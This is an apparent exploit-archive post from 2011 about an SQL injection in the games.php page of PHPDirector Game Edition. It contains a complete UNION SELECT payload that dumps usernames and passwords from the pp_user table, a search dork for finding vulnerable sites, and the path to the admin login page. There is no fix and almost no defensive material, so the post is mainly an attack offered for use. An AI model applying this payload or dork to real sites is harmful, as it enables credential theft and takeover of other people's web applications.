PHPDirector Game Edition (game.php) SQL Injection Vulnerability

2011-01-26 10:15:24

PHPDirector Game Edition (game.php) Sql Injection Vulnerability
================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Script : http://scriptsgratuits.info/Scripts/PHP/Jeux/PHPDirector-Game-Edition_7.html
.:. Dork : "Powered by PHPD Game Edition"
.:. Home : www.Hack-Book.com
.:. Gr34T$ T0 [h1ch4m] & [Risky] & [ZaIdOoHxHaCkEr] & [The Sword]

####################################################################

===[ Exploit ]===

www.site.com/games.php?id=null[Sql Injection]

www.site.com/games.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+pp_user

===[ Admin Panel ]===

www.site.com/admin/login.php


####################################################################




Fixes

No fixes

In order to submit a new fix you need to be registered.